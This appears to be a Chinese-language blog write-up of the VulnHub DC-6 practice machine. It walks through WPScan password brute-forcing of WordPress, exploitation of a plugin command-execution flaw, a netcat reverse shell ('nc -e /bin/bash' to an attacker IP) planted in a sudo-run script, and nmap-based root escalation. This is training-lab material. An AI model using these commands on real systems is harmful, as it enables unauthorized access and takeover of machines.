# 前言

这个系列的第 6 篇了,正在学习的东西又卡住了,还是来补充一下这个系列吧

# 环境

靶机地址:DC: 6 ~ VulnHub

使用 VMware 搭建环境(这个参考这个系列的第一篇即可 DC-1 - Vulnhub | Clown の Blog = (xcu.icu),环境搭建都一样,这里我还是将网络模式改为了 nat)

在靶机地址最后,它提供了一个 CLUE

OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)

很显然这里密码集就确定了

# 打靶流程

首先还是先做一些简单的信息收集

image-20240124185640853

然后进行协议的发现(这里好像也不是很必要,,,,那就算了),这里首先去看一下 80 端口的 web 服务

image-20240124190302011

这里尝试访问发现会直接跳转到这个域名,但是 dns 服务器无法解析这个域名,这里用 nmap 验证一下

image-20240124190631797

这里修改一下本机的 host 文件即可

image-20240124190935554

image-20240124191004181

这样就可以看到 80 端口上的服务了,打开这个页面实际上很明显,这是一个 WordPress 的 cms,因为这里是 WordPress 我们直接使用 WPscan 来做扫描,它是一个扫描 WordPress 漏洞的黑盒子扫描器,根据靶机作者给的提示,我们需要再 rokyou 这个密码字典来获得一个新的密码字典来爆破用户名和密码,kali 中 rockyou.txt 在下面的目录中

cat /usr/share/eaphammer/wordlists/rockyou.txt | grep k01 > passwords.txt

然后利用 WPscan 来爆破密码

wpscan --url http://wordy/ --enumerate u -P ./passwords.txt

获得密码

image-20240124200431149

mark
helpdesk01

image-20240124201042603

后台发现 Activity on Wordy 插件,在这个插件是存在代码执行漏洞的,这里直接利用这个漏洞

image-20240124201418277

这里就已经可以命令执行了,但是当前的权限比较低,这里反弹一个 shell 出来

image-20240124201659949

然后 python 优化一下 shell

python -c 'import pty;pty.spawn("/bin/bash")'

接下来需要做的就是提权了,因为本台靶机是开放了 22 端口的,所以这里看一下 passwd 文件,发现这里能通过 ssh 连接的用户比较多

image-20240124201943280

所以这里分别去查看了几个用户的 home 目录,最后还是在当前用户目录有所发现

image-20240124202332180

这里可以看到,在这个文件中存放了 graham 用户的密码,这里直接去 ssh 连接

image-20240124202441865

这里成功登录到这个用户

image-20240124202514220

查看 graham 用户的 sudo -l 权限,可以以 jens 用户权限执行 backups.sh 脚本,想这个文件中写入一个反弹 shell 的命令

echo " nc -e /bin/bash 192.168.246.136 6667 " > backups.sh

image-20240124202709468

然后运行这个 shell 脚本

image-20240124202824219

然后这里就拿到了 jens 的权限,这里还是用 python 来优化

python -c 'import pty;pty.spawn("/bin/bash")'

image-20240124202918094

当前用户对 nmap 设置权限有问题,这里可以利用 nmap 来提权

nmap 提权分为两种

旧版本上以进入交互提权

# 进入 nmap 的交互模式
nmap --interactive
# 执行 sh,提权成功
!sh

新版本

echo 'os.execute("/bin/sh")' >/tmp/TF
sudo nmap --script=/tmp/TF

image-20240124203054402

这样就算是成功了